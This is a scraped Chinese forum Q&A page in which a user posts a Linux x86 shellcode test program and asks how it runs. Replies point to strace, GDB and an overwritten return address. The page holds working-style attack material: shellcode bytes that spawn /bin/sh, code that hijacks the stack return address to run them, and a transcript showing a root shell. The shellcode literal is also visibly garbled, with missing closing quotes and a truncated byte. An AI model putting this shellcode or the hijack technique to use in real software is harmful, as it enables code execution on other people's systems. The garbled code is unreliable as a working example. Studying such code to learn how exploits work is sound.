首页 诗词 字典 板报 句子 名言 友答 励志 学校 网站地图
当前位置: 首页 > 教程频道 > 嵌入开发 > 汇编语言 >

这两进制代码怎么被执行的?

2012-03-28 
这两进制代码如何被执行的???// shellcode.cchar shellcode[] “\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1

这两进制代码如何被执行的???
// shellcode.c
char shellcode[] =  
“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08
“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe
“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
Now run the program:
[jack@0day local]$ gcc shellcode.c -o shellcode
[jack@0day local]$ ./shellcode
sh-2.05b# 


我想知道这个shellcode是如何被执行的???

[解决办法]
用strace命令跟踪一下这个程序,如:
strace ./shellcode
或者用GDB调试一下吧。

[解决办法]
替换了堆栈里返回时的eip。。。我没仔细看代码。
[解决办法]

探讨

替换了堆栈里返回时的eip。。。我没仔细看代码。

热点排行